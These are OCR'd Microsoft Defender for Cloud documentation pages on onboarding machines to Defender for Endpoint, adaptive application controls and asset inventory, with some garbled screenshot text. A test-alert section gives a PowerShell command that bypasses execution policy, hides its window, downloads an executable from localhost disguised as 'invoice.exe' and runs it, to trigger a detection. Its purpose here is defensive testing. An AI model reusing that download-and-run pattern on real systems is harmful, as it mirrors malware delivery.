Agentless scanning for machines (preview) Scans your machines for installed software and vulnerabilities without relying on agents E E Edit configuration On off) 
or impacting machine performance. Learn more 


4. To enable the Unified solution for Windows Server 2012 R2 and 2016 machines, 
select Enable. 


Missing components 


Microsoft defender for endpoints 


Linux machines 


Automatic deployment of Microsoft Defender for Endpoint to Linux machines is currently 
disabled. We recommend you to enable this protection for optimal security coverage. Learn 
more 


| Enable 


OO This will auto-provision Microsoft Defender for Endpoint to new and existing Linux machines. 


Unified solution 


Automatic deployment of the modern version of Defender for Endpoint for Windows servers 
2012R2 and Windows servers 2016 is currently disabled. We recommend you to enable this 
protection for optimal security coverage. Learn more 


OO This will auto-provision Microsoft Defender for Endpoint new unified solution to new and existing 
Windows servers 2012R2 and 2016. 


Close 


5. To save the changes, select Save at the top of the page and then select Continue 


in the Settings and monitoring page. 
Microsoft Defender for Cloud will: 


e Stop the existing MDE process in the Log Analytics agent that collects data for 


Defender for Servers. 
e Install the MDE unified solution for all existing and new Windows Server 2012 R2 


and 2016 machines. 


Microsoft Defender for Cloud will automatically onboard your machines to Microsoft 
Defender for Endpoint. Onboarding might take up to 12 hours. For new machines 
created after the integration has been enabled, onboarding takes up to an hour. 


© Note 


If you choose not to deploy the MDE unified solution to your Windows 2012 R2 
and 2016 servers in Defender for Servers Plan 2 and then downgrade Defender for 
Servers to Plan 1, the MDE unified solution is not deployed to those servers so that 
your existing deployment is not changed without your explicit consent. 


Users who never enabled the integration with Microsoft Defender 
for Endpoint for Windows 


If you've never enabled the integration for Windows, Endpoint protection enables 


Defender for Cloud to deploy Defender for Endpoint to both your Windows and Linux 
machines. 


To deploy the MDE unified solution, you'll need to use the REST API call or the Azure 
portal: 


1. From Defender for Cloud's menu, select Environment settings and select the 


subscription with the machines that you want to receive Defender for Endpoint. 


2. In the status of the Endpoint protection component, select On to enable the 
integration with Microsoft Defender for Endpoint. 
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The MDE agent unified solution is deployed to all of the machines in the selected 
subscription. 


Linux 


You'll deploy Defender for Endpoint to your Linux machines in one of these ways, 
depending on whether you've already deployed it to your Windows machines: 


e Enable for a specific subscription in the Azure portal environment settings 
o Existing users with Defender for Cloud's enhanced security features enabled and 
Microsoft Defender for Endpoint for Windows 
o New users who never enabled the integration with Microsoft Defender for 
Endpoint for Windows 
e Enable for multiple subscriptions in the Azure portal dashboard 
e Enable for multiple subscriptions with a PowerShell script 


© Note 


When you enable automatic deployment, Defender for Endpoint for Linux 
installation will abort on machines with pre-existing running services using fanotify 
and other services that can also cause MDE to malfunction or may be affected by 
MDE, such as security services. After you validate potential compatibility issues, we 
recommend that you manually install Defender for Endpoint on these servers. 


Existing users with Defender for Cloud's enhanced security 
features enabled and Microsoft Defender for Endpoint for 
Windows 


If you've already enabled the integration with Defender for Endpoint for Windows, you 
have complete control over when and whether to deploy Defender for Endpoint to your 
Linux machines. 


1. From Defender for Cloud's menu, select Environment settings and select the 
subscription with the Linux machines that you want to receive Defender for 
Endpoint. 


2. In the Monitoring coverage column of the Defender for Server plan, select 
Settings. 


The status of the Endpoint protections component is Partial, meaning that not all 
parts of the component are enabled. 
© Note 


If the status is Off isn't selected, use the instructions in Users who've never 
enabled the integration with Microsoft Defender for Endpoint for Windows. 


3. Select Fix to see the components that aren't enabled. 


Microsoft Azure 


Home > Microsoft Defender for Cloud | Environment settings > Settings | Defender plans > 


Settings & monitoring - x 


Contoso hoi 


E continue 


When you enable an extension, it will be installed on any new or existing resource, by assigning a security policy. 


(Defenders plans : Servers 


Component Description Defender plans Configuration Status 
Log Analytics agent/Azure Monitor agent Collects security-related configurations and event logs from the machine and stores the EO EE Agent Type: Log Analytics 
data in your Log Analytics workspace for analysis. Learn more Selected workspace: default workspace 


Security events: None 
Edit configuration 


Vulnerability assessment for machines Enables vulnerability assessment on your Azure and hybrid machines. Learn more EO a ( 


Endpoint protection Enables protection powered by Microsoft Defender for Endpoint, including automatic EZ - GED o ) 
EEE agent deployment to your servers, and security data integration with Defender for 
Cloud. Learn more 


Agentless scanning for machines (preview) Scans your machines for installed software and vulnerabilities without relying on agents E E Edit configuration On off) 
or impacting machine performance. Learn more 


4. To enable deployment to Linux machines, select Enable. 


Missing components 


Microsoft defender for endpoints 


Linux machines 


Automatic deployment of Microsoft Defender for Endpoint to Linux machines is currently 
disabled. We recommend you to enable this protection for optimal security coverage. Learn 
more 


OO This will auto-provision Microsoft Defender for Endpoint to new and existing Linux machines. 


Unified solution 


Automatic deployment of the modern version of Defender for Endpoint for Windows servers 
2012R2 and Windows servers 2016 is currently disabled. We recommend you to enable this 
protection for optimal security coverage. Learn more 


| Enable | 


OO This will auto-provision Microsoft Defender for Endpoint new unified solution to new and existing 
Windows servers 2012R2 and 2016. 


Close 


5. To save the changes, select Save at the top of the page and then select Continue 


in the Settings and monitoring page. 
Microsoft Defender for Cloud will: 


e Automatically onboard your Linux machines to Defender for Endpoint 
e Detect any previous installations of Defender for Endpoint and reconfigure 
them to integrate with Defender for Cloud 


Microsoft Defender for Cloud will automatically onboard your machines to 
Microsoft Defender for Endpoint. Onboarding might take up to 12 hours. For new 
machines created after the integration has been enabled, onboarding takes up to 


an hour. 


O Note 


The next time you return to this page of the Azure portal, the Enable for Linux 
machines button won't be shown. To disable the integration for Linux, you'll 
need to disable it for Windows too by turning the toggle off in Endpoint 
Protection, and selecting Continue. 


6. To verify installation of Defender for Endpoint on a Linux machine, run the 
following shell command on your machines: 


mdatp health 


If Microsoft Defender for Endpoint is installed, you'll see its health status: 


healthy : true 
licensed: true 


Also, in the Azure portal you'll see a new Azure extension on your machines called 
MDE.Linux. 


New users who never enabled the integration with Microsoft 
Defender for Endpoint for Windows 


If you've never enabled the integration for Windows, endpoint protection enables 
Defender for Cloud to deploy Defender for Endpoint to both your Windows and Linux 
machines. 


1. From Defender for Cloud's menu, select Environment settings and select the 
subscription with the Linux machines that you want to receive Defender for 
Endpoint. 


2. In the Monitoring coverage column of the Defender for Server plan, select 
Settings. 


3. In the status of the Endpoint protection component, select On to enable the 
integration with Microsoft Defender for Endpoint. 
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Agentless scanning for machines (preview) 


Microsoft Defender for Cloud will: 


e Automatically onboard your Windows and Linux machines to Defender for 
Endpoint 


e Detect any previous installations of Defender for Endpoint and reconfigure 
them to integrate with Defender for Cloud 


Onboarding might take up to 1 hour. 
4. Select Continue and Save to save your settings. 


5. To verify installation of Defender for Endpoint on a Linux machine, run the 
following shell command on your machines: 


mdatp health 


If Microsoft Defender for Endpoint is installed, you'll see its health status: 


healthy : true 


licensed: true 


In addition, in the Azure portal you'll see a new Azure extension on your machines 
called MDE.Linux. 


Enable for multiple subscriptions in the Azure portal dashboard 


If one or more of your subscriptions don't have Endpoint protections enabled for Linux 
machines, you'll see an insight panel in the Defender for Cloud dashboard. The insight 
panel tells you about subscriptions that have Defender for Endpoint integration enabled 
for Windows machines, but not for Linux machines. You can use the insight panel to see 
the affected subscriptions with the number of affected resources in each subscription. 


Subscriptions that don't have Linux machines show no affected resources. You can then 
select the subscriptions to enable endpoint protection for Linux integration. 


After you select Enable in the insight panel, Defender for Cloud: 


e Automatically onboards your Linux machines to Defender for Endpoint in the 
selected subscriptions. 

e Detects any previous installations of Defender for Endpoint and reconfigure them 
to integrate with Defender for Cloud. 


Use the Defender for Endpoint status workbook £ to verify installation and deployment 
status of Defender for Endpoint on a Linux machine. 


Enable for multiple subscriptions with a PowerShell script 


Use our PowerShell script “ from the Defender for Cloud GitHub repository to enable 
endpoint protection on Linux machines that are in multiple subscriptions. 


Manage automatic updates configuration for Linux 


In Windows, Defender for Endpoint version updates are provided via continuous 
knowledge base updates; in Linux you need to update the Defender for Endpoint 
package. When you use Defender for Servers with the MDE.Linux extension, automatic 
updates for Microsoft Defender for Endpoint are enabled by default. If you wish to 
manage the Defender for Endpoint version updates manually, you can disable automatic 
updates on your machines. To do so, add the following tag for machines onboarded 
with the MDE.Linux extension. 


e Tag name: 'ExcludeMdeAutoUpdate' 
e Tag value: ‘true’ 


This configuration is supported for Azure VMs and Azure Arc machines, where the 


MDE.Linux extension initiates auto-update. 


Enable the MDE unified solution at scale 


You can also enable the MDE unified solution at scale through the supplied REST API 
version 2022-05-01. For full details, see the API documentation. 


Here's an example request body for the PUT request to enable the MDE unified solution: 


URI: 


https: //management.azure.com/subscriptions/<subscriptionId>/providers/Microsoft.Sec 


urity/settings/WDATP_UNIFIED SOLUTION?api-version=2022-05-@1 


JSON 


"name": "WDATP_UNIFIED SOLUTION", 
"type": "Microsoft.Security/settings", 
"kind": "DataExportSettings", 
"properties": { 

"enabled": true 


Track MDE deployment status 


You can use the Defender for Endpoint deployment status workbook £ to track the MDE 
deployment status on your Azure VMs and non-Azure machines that are connected via 
Azure Arc. The interactive workbook provides an overview of machines in your 
environment showing their Microsoft Defender for Endpoint extension deployment 
status. 


Access the Microsoft Defender for Endpoint 
portal 


1. Ensure the user account has the necessary permissions. Learn more in Assign user 


access to Microsoft Defender Security Center. 


2. Check whether you have a proxy or firewall that is blocking anonymous traffic. The 
Defender for Endpoint sensor connects from the system context, so anonymous 
traffic must be permitted. To ensure unhindered access to the Defender for 
Endpoint portal, follow the instructions in Enable access to service URLs in the 


proxy server. 


3. Open the Microsoft 365 Defender portal “. Learn about Microsoft Defender for 
Endpoint in Microsoft 365 Defender. 


Send a test alert 


To generate a benign test alert from Defender for Endpoint, select the tab for the 
relevant operating system of your endpoint: 


e Test on Windows 


e Test on Linux 


Test on Windows 

For endpoints running Windows: 
1. Create a folder 'C:\test-MDATP-test’. 
2. Use Remote Desktop to access your machine. 
3. Open a command-line window. 


4. At the prompt, copy and run the following command. The command prompt 


window will close automatically. 


PowerShell 


powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden 
(New-Object 

System.Net .WebClient) .DownloadFile('http://127.0.0.1/1.exe'’, ‘'C:\\test- 
MDATP-test\\invoice.exe'); Start-Process 'C:\\test-MDATP- 
test\\invoice.exe' 


Ge Command Prompt 


If the command is successful, you'll see a new alert on the workload protection 
dashboard and the Microsoft Defender for Endpoint portal. This alert might take a 
few minutes to appear. 


5. To review the alert in Defender for Cloud, go to Security alerts > Suspicious 
PowerShell CommandLine. 


6. From the investigation window, select the link to go to the Microsoft Defender for 
Endpoint portal. 


Q Tip 


The alert is triggered with Informational severity. 


Test on Linux 
For endpoints running Linux: 
1. Download the test alert tool from: https://aka.ms/LinuxDlY Z 
2. Extract the contents of the zip file and execute this shell script: 
. /mde_linux_edr_diy 


If the command is successful, you'll see a new alert on the workload protection 
dashboard and the Microsoft Defender for Endpoint portal. This alert might take a 
few minutes to appear. 


3. To review the alert in Defender for Cloud, go to Security alerts > Enumeration of 


files with sensitive data. 


4. From the investigation window, select the link to go to the Microsoft Defender for 
Endpoint portal. 


Q Tip 


The alert is triggered with Low severity. 


Remove Defender for Endpoint from a machine 


To remove the Defender for Endpoint solution from your machines: 


1. Disable the integration: 
a. From Defender for Cloud's menu, select Environment settings and select the 
subscription with the relevant machines. 
b. In the Defender plans page, select Settings & Monitoring. 
c. In the status of the Endpoint protection component, select Off to disable the 
integration with Microsoft Defender for Endpoint. 
d. Select Continue and Save to save your settings. 


2. Remove the MDE.Windows/MDE.Linux extension from the machine. 


3. Follow the steps in Offboard devices from the Microsoft Defender for Endpoint 
service from the Defender for Endpoint documentation. 


Next steps 


e Platforms and features supported by Microsoft Defender for Cloud 

e Learn how recommendations help you protect your Azure resources 

e View common question about the Defender for Cloud integration with Microsoft 
Defender for Endpoint 


Use adaptive application controls to 
reduce your machines’ attack surfaces 


Article e 08/09/2023 


Learn about the benefits of Microsoft Defender for Cloud's adaptive application controls 
and how you can enhance your security with this data-driven, intelligent feature. 


What are adaptive application controls? 


Adaptive application controls are an intelligent and automated solution for defining 
allowlists of known-safe applications for your machines. 


Often, organizations have collections of machines that routinely run the same processes. 
Microsoft Defender for Cloud uses machine learning to analyze the applications running 
on your machines and create a list of the known-safe software. Allowlists are based on 
your specific Azure workloads, and you can further customize the recommendations 
using the following instructions. 


When you've enabled and configured adaptive application controls, you'll get security 
alerts if any application runs other than the ones you've defined as safe. 


What are the benefits of adaptive application 
controls? 


By defining lists of known-safe applications, and generating alerts when anything else is 
executed, you can achieve multiple oversight and compliance goals: 


e Identify potential malware, even any that might be missed by antimalware 
solutions 

e Improve compliance with local security policies that dictate the use of only 
licensed software 

e Identify outdated or unsupported versions of applications 

e Identify software that's banned by your organization but is nevertheless running 
on your machines 

e Increase oversight of apps that access sensitive data 


No enforcement options are currently available. Adaptive application controls are 
intended to provide security alerts if any application runs other than the ones you've 
defined as safe. 


Availability 


Aspect Details 

Release state: General availability (GA) 

Pricing: Requires Microsoft Defender for Servers Plan 2 

Supported machines: © Azure and non-Azure machines running Windows and Linux 


© Azure Arc machines 


Required roles and Security Reader and Reader roles can both view groups and the lists 
permissions: of known-safe applications 
Contributor and Security Admin roles can both edit groups and the 
lists of known-safe applications 


Clouds: © Commercial clouds 
(v National (Azure Government, Microsoft Azure operated by 
21Vianet) 
(v) Connected AWS accounts 


Enable application controls on a group of 
machines 


If Microsoft Defender for Cloud has identified groups of machines in your subscriptions 
that consistently run a similar set of applications, you'll be prompted with the following 
recommendation: Adaptive application controls for defining safe applications should 
be enabled on your machines. 


Select the recommendation, or open the adaptive application controls page to view the 
list of suggested known-safe applications and groups of machines. 


1. Open the Workload protections dashboard and from the advanced protection 


area, select Adaptive application controls. 


soft Defender for Cloud | Workload protections 


| E Subscriptions ZU What's new 


Defender for Cloud coverage 


The Adaptive application controls page opens with your VMs grouped into the 
following tabs: 


e Configured - Groups of machines that already have a defined allowlist of 
applications. For each group, the configured tab shows: 
o the number of machines in the group 
o recent alerts 


e Recommended - Groups of machines that consistently run the same 
applications, and don't have an allowlist configured. We recommend that you 
enable adaptive application controls for these groups. 


Q Tip 


If you see a group name with the prefix REVIEWGROUP, it contains 
machines with a partially consistent list of applications. Microsoft 
Defender for Cloud can't see a pattern but recommends reviewing this 
group to see whether you can manually define some adaptive 
application controls rules as described in Edit a group's adaptive 
application controls rule. 


You can also move machines from this group to other groups as 
described in Move a machine from one group to another. 


e No recommendation - Machines without a defined allowlist of applications, 
and which don't support the feature. Your machine might be in this tab for 
the following reasons: 

o It's missing a Log Analytics agent 
o The Log Analytics agent isn't sending events 


o It's a Windows machine with a pre-existing AppLocker policy enabled by 


either a GPO or a local security policy 


o AppLocker isn't available (Windows Server Core installations) 


@ Tip 


Defender for Cloud needs at least two weeks of data to define the 


unique recommendations per group of machines. Machines that have 


recently been created, or which belong to subscriptions that were only 


recently protected by Microsoft Defender for Servers, will appear under 


the No recommendation tab. 


2. Open the Recommended tab. The groups of machines with recommended 


allowlists appear. 


Dashboard 


z, Adaptive application controls 


Showing 4 subscriptions 


bee 


+ Add custom group 


Configured No recommendation 


Groups of machines for which we recommend applying application controls to define a list of known-safe applications 


Group Name TA, Machines Ty State 
v ? Contoso Hotels 19 
(E) GROUP1 1 Open - 
(E) GROUP4 5 Open - 
EZI GROUP6 d 11 Open - 
EZI REVIEWGROUP1 1 Open - 
EZI REVIEWGROUP2 1 Open - 


3. Select a group. 


4. To configure your new rule, review the various sections of this Configure 


New 


New 


New 


New 


New 


N 


Severity Ty 


High 
High 
High 
High 


High 


application control rules page and the contents, which will be unique to this 


specific group of machines: 


Configure application control rules x 
GROUP6 


Description 


The steps below will guide you through the process of configuring application control rules that are 
unique to this specific group of machines. 


©) > Select machines 
©) > Recommended applications 
Q) A More applications 


The adaptive application controls policy is set per group and for all the machines that are selected, 
including such that are already configured. It includes the protection mode which will be set to audit 
mode. All settings can be edited once a group is configured. 


© BE 


a. Select machines - By default, all machines in the identified group are selected. 
Unselect any to remove them from this rule. 


b. Recommended applications - Review this list of applications that are common 
to the machines within this group, and recommended to be allowed to run. 


c. More applications - Review this list of applications that are either seen less 
frequently on the machines within this group, or are known to be exploitable. A 
warning icon indicates that a specific application could be used by an attacker 
to bypass an application allowlist. We recommend that you carefully review 
these applications. 


Ọ Tip 


Both application lists include the option to restrict a specific application to 
certain users. Adopt the principle of least privilege whenever possible. 


Applications are defined by their publishers. If an application doesn't have 
publisher information (it's unsigned), a path rule is created for the full path 
of the specific application. 


d. To apply the rule, select Audit. 


Edit a group's adaptive application controls 
rule 


You might decide to edit the allowlist for a group of machines because of known 
changes in your organization. 


To edit the rules for a group of machines: 


1. Open the Workload protections dashboard and from the advanced protection 
area, select Adaptive application controls. 


2. From the Configured tab, select the group with the rule you want to edit. 


3. Review the various sections of the Configure application control rules page as 
described in Enable adaptive application controls on a group of machines. 


4. Optionally, add one or more custom rules: 


a. Select Add rule. 


Edit application control policy Add rule x 


omar Add a new rule to the application control policy group by choosing 


the rule type and inserting the corresponding rule data 
‘I! Group settings | + Add rule ave ZI Delete b g P 9 


Rule type 
> Recent Alerts 
> Configured machines Publisher 


> Publisher allowlist rules 
> Path allowlist rules 


Allowed users © 


(GEFEN specific users ) 
Protected file types 


IIA 
@ exe 
@ si 
TI SCRIPT 


b. If you're defining a known safe path, change the Rule type to ‘Path' and enter a 
single path. You can include wildcards in the path. The following screens show 
some examples of how to use wildcards. 


Add rule x Add rule x 


Add a new rule to the application control policy group by choosing Add a new rule to the application control policy group by choosing 
the rule type and inserting the corresponding rule data the rule type and inserting the corresponding rule data 
Rule type Rule type 
Path C Path 
Examples (enter a single path): Examples (enter a single path): 
C:\Octopus\Calamari\3.3.13\Octodiff.msi /opt/microsoft/omsagent/ruby/bin/1.1/ruby 
C:\\Octopus\Calamari\*\Octodiff.msi /opt/microsoft/omsagent/ruby / 
C:\Octopus\Calamari\* /opt/microsoft/omsagent/ruby/bin/* 
Ọ Tip 


Some scenarios for which wildcards in a path might be useful: 


e Using a wildcard at the end of a path to allow all executables within 
this folder and sub-folders. 

e Using a wildcard in the middle of a path to enable a known 
executable name with a changing folder name (for example, personal 
user folders containing a known executable, automatically generated 


folder names, etc). 


c. Define the allowed users and protected file types. 
d. When you've finished defining the rule, select Add. 


5. To apply the changes, select Save. 


Review and edit a group's settings 


1. To view the details and settings of your group, select Group settings. 


This pane shows the name of the group (which can be modified), the OS type, the 
location, and other relevant details. 


Edit application control policy & Group settings x 


GROUPS GROUPS 
ill Group settings | + Add rule E Delete Configure the settings below to apply on the machines that are 
currently assigned to this application control policy group 
> Recent Alerts 


> Configured machines 


Location © 


> Publisher allowlist rules € 
Group name 


> Path allowlist rules GROUPS v 


OS type © 
Environment type © | 


File type protection mode 


EXE (audit Unconfigured ) 

MSI ( aut CEED 

SCRIPT (aut CED 

Add machines to group 

| O Search machines 
o Configured machines îy Group name Ty 
No results 

| 9 Search machines 
E Unconfigured machines TA, Group name E 
No results 


| Cancel | 


2. Optionally, modify the group's name or file type protection modes. 


3. Select Apply and Save. 


Respond to the "Allowlist rules in your adaptive 
application control policy should be updated" 
recommendation 


You'll see this recommendation when Defender for Cloud's machine learning identifies 
potentially legitimate behavior that hasn't previously been allowed. The 
recommendation suggests new rules for your existing definitions to reduce the number 


of false positive alerts. 
To remediate the issues: 


1. From the recommendations page, select the Allowlist rules in your adaptive 
application control policy should be updated recommendation to see groups 
with newly identified, potentially legitimate behavior. 


2. Select the group with the rule you want to edit. 


3. Review the various sections of the Configure application control rules page as 
described in Enable adaptive application controls on a group of machines. 


4. To apply the changes, select Audit. 


Audit alerts and violations 


1. Open the Workload protections dashboard and from the advanced protection 


area, select Adaptive application controls. 


2. To see groups with machines that have recent alerts, review the groups listed in the 


Configured tab. 


3. To investigate further, select a group. 


Dashboard > Microsoft Defender for Cloud | Adaptive application controls 


Edit application control policy x 
GROUP4 
I Group settings -+ Add rule Delete 
SE galde da EEE 
Alerts (last week) No. of machines 
A Violations eek 3 


> Configured machines 
> Publisher allowlist rules 


> Path allowlist rules 


4. For further details, and the list of affected machines, select an alert. 


The security alerts page shows more details of the alerts and provides a Take 
action link with recommendations of how to mitigate the threat. 


Security alerts ~ x 


el Refresh S Ss Open query ZG Suppression rules $ Security alerts map OI Sample alerts d Download csv report 


Ọ 599 E) 


Active alerts Affected resources 
Active alerts by severity 


I Medium (599) 


application control Subscription == All Status == Active X Severity == Low, Medium, High >< ty Add filter 


[ No grouping wv f 


Severity d Alert title Ty Affected resource Ty Activity start time (UTC+2) TL] MITRE ATT&CK® t... Status Ty 
| Medium O Adaptive application control ... EA m-vm1 03/03/21, 01:56 AM $ Execution Active 
a ° 
| Medium O Adaptive application control... E vm-test-a 03/03/21, 01:56 AM $ Execution Active 
| Medium @ Adaptive application control... EA server-test 03/03/21, 01:56 AM $ Execution Active 
© Note 


Adaptive application controls calculates events once every twelve hours. The 
"activity start time" shown in the security alerts page is the time that adaptive 


application controls created the alert, not the time that the suspicious process 
was active. 


Move a machine from one group to another 


When you move a machine from one group to another, the application control policy 
applied to it changes to the settings of the group that you moved it to. You can also 
move a machine from a configured group to a non-configured group, which removes 
any application control rules that were applied to the machine. 


1. Open the Workload protections dashboard and from the advanced protection 
area, select Adaptive application controls. 


2. From the Adaptive application controls page, from the Configured tab, select the 
group containing the machine to be moved. 


3. Open the list of Configured machines. 


4. Open the machine's menu from three dots at the end of the row, and select Move. 
The Move machine to a different group pane opens. 


5. Select the destination group, and select Move machine. 


6. To save your changes, select Save. 


Manage application controls via the REST API 


To manage your adaptive application controls programmatically, use our REST API. 


The relevant API documentation is available in the Adaptive application Controls section 
of Defender for Cloud's API docs. 


Some of the functions available from the REST API include: 


e List retrieves all your group recommendations and provides a JSON with an object 


for each group. 


e Get retrieves the JSON with the full recommendation data (that is, list of machines, 


publisher/path rules, and so on). 


e Put configures your rule (use the JSON you retrieved with Get as the body for this 


request). 


© Important 


The Put function expects fewer parameters than the JSON returned by the Get 


command contains. 


Remove the following properties before using the JSON in the Put request: 
recommendationStatus, configurationStatus, issues, location, and 
sourceSystem. 


Next steps 


On this page, you learned how to use adaptive application control in Microsoft Defender 
for Cloud to define allowlists of applications running on your Azure and non-Azure 
machines. To learn more about some other cloud workload protection features, see: 


e Understanding just-in-time (JIT) VM access 
e Securing your Azure Kubernetes clusters 
e View common question about Adaptive application controls 


Use asset inventory to manage your 
resources’ security posture 


Article e 06/19/2023 


The asset inventory page of Microsoft Defender for Cloud shows the security posture of 
the resources you've connected to Defender for Cloud. Defender for Cloud periodically 
analyzes the security state of resources connected to your subscriptions to identify 
potential security issues and provides you with active recommendations. Active 
recommendations are recommendations that can be resolved to improve your security 
posture. 


Use this view and its filters to address such questions as: 


e Which of my subscriptions with Defender plans enabled have outstanding 
recommendations? 

e Which of my machines with the tag ‘Production’ are missing the Log Analytics 
agent? 

e How many of my machines tagged with a specific tag have outstanding 
recommendations? 

e Which machines in a specific resource group have a known vulnerability (using a 
CVE number)? 


The security recommendations on the asset inventory page are also shown in the 
Recommendations page, but here they're shown according to the affected resource. 


Learn more about implementing security recommendations. 


Availability 


Aspect Details 
Release state: General availability (GA) 
Pricing: Free 


Some features of the inventory page, such as the software inventory 
require paid solutions to be in-place 


Required roles and All users 
permissions: 


Aspect Details 


Clouds: © Commercial clouds 
OO National (Azure Government, Azure China 21Vianet) 


Software inventory isn't currently supported in national clouds. 


What are the key features of asset inventory? 


The inventory page provides the following tools: 


Microsoft Defender for Cloud | Inventory ~ x 


Showing 8 subscriptions 


C D) Refresh -} Add non-Azure servers E Open query 4 Download CSV report d © Learn more A Guides & Feedback 


© Filter by name | Subscriptions == All Resource Groups == All X Resource types == All X Defender for Cloud == All X Monitoring agent == All X 


Environment == All X Recommendations == All X Installed applications == All X H7 Add filter 


Total Resources Unhealthy Resources Unmonitored Resources Unregistered subscriptions 
Gu 1904 | 318 % 0 % 0 
A © ix) 
Resource name Ty Resource type Ty Subscription Ty Monitoring agent Ty Defender for Cloud Ty Recommendations Ty 
T Contoso Hotels Tenan... Subscription Contoso Hotels Tenant On as Er 
E govtestvm Virtual machines Contoso Infra1 © installed On B 
? Contoso Hotels Tenan... Subscription Contoso Hotels Tenant On B ss 
E channon-hicks-vm-test Virtual machines Contoso Infra1 © installed On PE mou 
? Contoso Infra1 Subscription Contoso Infra1 On = Ul Å. 
E kenieva-sql-server SQL servers Contoso Infra1 On B E + 


1 - Summaries 


Before you define any filters, a prominent strip of values at the top of the inventory view 
shows: 


e Total resources: The total number of resources connected to Defender for Cloud. 

e Unhealthy resources: Resources with active security recommendations that you 
can implement. Learn more about implementing security recommendations. 

e Unmonitored resources: Resources with agent monitoring issues - they have the 
Log Analytics agent deployed, but the agent isn't sending data or has other health 
issues. 

e Unregistered subscriptions: Any subscription in the selected scope that hasn't yet 
been connected to Microsoft Defender for Cloud. 


2 - Filters 


The multiple filters at the top of the page provide a way to quickly refine the list of 
resources according to the question you're trying to answer. For example, if you wanted 


to know which of your machines with the tag ‘Production’ are missing the Log Analytics 
agent, you can filter the list for Agent monitoring:"Not installed" and Tags:"Production". 


As soon as you've applied filters, the summary values are updated to relate to the query 


results. 


3 - Export and asset management tools 


Export options - Inventory includes an option to export the results of your selected filter 
options to a CSV file. You can also export the query itself to Azure Resource Graph 
Explorer to further refine, save, or modify the Kusto Query Language (KQL) query. 


Q Tip 


The KQL documentation provides a database with some sample data together with 
some simple queries to get the "feel" for the language. Learn more in this KQL 
tutorial. 


Asset management options - When you've found the resources that match your 
queries, inventory provides shortcuts for operations such as: 


e Assign tags to the filtered resources - select the checkboxes alongside the 
resources you want to tag. 

e Onboard new servers to Defender for Cloud - use the Add non-Azure servers 
toolbar button. 

e Automate workloads with Azure Logic Apps - use the Trigger Logic App button to 
run a logic app on one or more resources. Your logic apps have to be prepared in 
advance, and accept the relevant trigger type (HTTP request). Learn more about 


logic apps. 


How does asset inventory work? 


Asset inventory utilizes Azure Resource Graph (ARG), an Azure service that lets you 
query Defender for Cloud's security posture data across multiple subscriptions. 


ARG is designed to provide efficient resource exploration with the ability to query at 
scale. 


You can use Kusto Query Language (KQL) in the asset inventory to quickly produce deep 
insights by cross-referencing Defender for Cloud data with other resource properties. 


How to use asset inventory 


1. From Defender for Cloud's sidebar, select Inventory. 


2. Use the Filter by name box to display a specific resource, or use the filters to focus 
on specific resources. 


By default, the resources are sorted by the number of active security 
recommendations. 
@ Important 


The options in each filter are specific to the resources in the currently selected 
subscriptions and your selections in the other filters. 


For example, if you've selected only one subscription, and the subscription 
has no resources with outstanding security recommendations to remediate (0 
unhealthy resources), the Recommendations filter will have no options. 


Dashboard > Microsoft Defender for Cloud 
5a Microsoft Defender for Cloud | Inventory x 
s 8 subscriptions 
l P Search (®) Refresh -} Add non-Azure servers “S Open query d Download CSV repot lA 
General e 5 a z a 
Filter by name Subscriptions == All Resource Groups == All X Resource types == All X Defender for Cloud == All X 
© overview Monitoring ag Ii X Environment == All X ko Add filter 
@ Getting started 
Total Resources Unhealthy Resources Unmonitored Resources Unregistered subscriptions 


ebe #5761 ®% 3009 %0 % 0 


TZ Inventory 


Resource name Ty Resource type Ty * Monitoring agent Ty Defender for Cloud Ty Recommendations Ty 
a4 Workbooks 

@ singularitybase Container registries A On — | 
GA Community 

EI sqliaasextension Virtual machines Extens... A a 
eC Diagnose and solve problems 

$ vm5ws2016250 Network interfaces KI ITT rn 
Cloud Securit 

ty EG ascdockercontainer312 Network interfaces B E 

E secure Score II GZ containers-demo-ubutS66 Network interfaces = ren 
E Regulatory compliance E saltoremidiatea3a Network interfaces ee 
Q Workload protections E aks-agentpool-10453507-... On-premises machines 
E Firewall Manager Lia OO i caine ae = ' E SG 


Management 


Page | 4 v | of 116 Next 


I Pricing & settings 


3. To use the Security findings contain filter, enter free text from the ID, security 
check, or CVE name of a vulnerability finding to filter to the affected resources: 


Dashboard > Microsoft Defender for Cloud | Recommendations 176875-Debian Security Update for systemd 
Vulnerabilities in Azure Container Registry images should be remediated (pow 


“ Description 
Unhealthy registries Severity Total vulnerabilities Vulnerabilities by severity 


A Debian has released security update for systemd to fix the vulnerabilities. 
A 2/2 | Higl (x) 131 High 33 m 


Medium Ts 
“ General information 


Low rar 
D 176875 
Severity @ High 
vV Description Type Vulnerability 
V Remediation steps Published 5/6/2019, 1:54 PM GMT+3 
Patchable Yes 
V Affected resources 
Cvss 3.0 base score 98 
A Security Checks 
patzen OE CVE-2018-1049 of 
Findings CVE-2018-15686 of 
1D Security Check Category Applies To ^ Remediation 
176750 Debian Security Update for apache? Ll Debian 5 of 12 Scanned Images Refer to Debian 9 - CVE-2018-15686 and Debian 9 - CVE-2018-1049 to address 
this issue and obtain further details. 
176875 Debian Security Update for systemd | Debian 5 of 12 Scanned Images 
176853 Debian Security Update for libssh2 (0...) Debian 4 of 12 Scanned Images EGU 
Following are links for downloading patches to fix the vulnerabilities: 
177050 Debian Security Update for linux (DS... | Debian 3 of 12 Scanned Images 
CVE-2018-15686: Debian 
177442 Debian Security Update for file (DSA ... ] Debian 3 of 12 Scanned Images 
-2018-1049: 
177260 Debian Security Update for linux (DS... | Debian 3 of 12 Scanned Images CVE-2018-1049: Debian 


@ Tip 


The Security findings contain and Tags filters only accept a single value. To 
filter by more than one, use Add filters. 


4. To use the Defender for Cloud filter, select one or more options (Off, On, or 
Partial): 


e Off - Resources not protected by a Microsoft Defender plan. You can right- 
click on the resources and upgrade them: 


v] E etzien Virtual machines Contoso @ Monitored C= e TE 


TI B retaileusé Virtual machines Contoso @ Monitored C View resource see 


p E 


: : : Upgrade 
O EZ erein Virtual machines Contoso @ Monitored Cc Pg 


e On - Resources protected by a Microsoft Defender plan 


e Partial - Subscriptions with some but not all of the Microsoft Defender plans 
disabled. For example, the following subscription has seven Microsoft 
Defender plans disabled. 


gı Settings | Defender plans 


Contoso Infra2 


EI save 


Enhanced security off 


“A. Select Defender plan by resource type Enable all 


Enable all Microsoft Defender for Cloud plans 


Microsoft Defender for Resource Quantity Pricing Plan 

E servers 10 servers Server/Month o On en ) 
